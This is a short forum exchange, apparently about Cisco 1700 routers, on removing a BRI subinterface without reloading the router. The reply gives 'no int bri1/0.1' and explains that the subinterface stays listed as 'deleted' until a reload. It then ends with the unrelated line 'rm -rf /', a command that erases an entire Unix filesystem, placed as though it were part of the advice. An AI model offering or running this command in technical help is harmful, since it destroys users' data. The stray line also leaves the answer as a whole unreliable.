Removing BRI sub interfaces

Hey All

Hope you enjoyed your festive season....but back to toil and trouble. I have 1700 router, i would like to know if i added a bri1/0.1 interface, how can i remove it from the configs without reloading the configs?

    you should be able to remove it in global config mode

    no int bri1/0.1

    it may give a message about "some config may return if this interface is reactivated".

    generally when you remove a subinterface it will be removed , but will show up with a status of "deleted"
    it will not be truly gone until you reload the router.
    rm -rf /
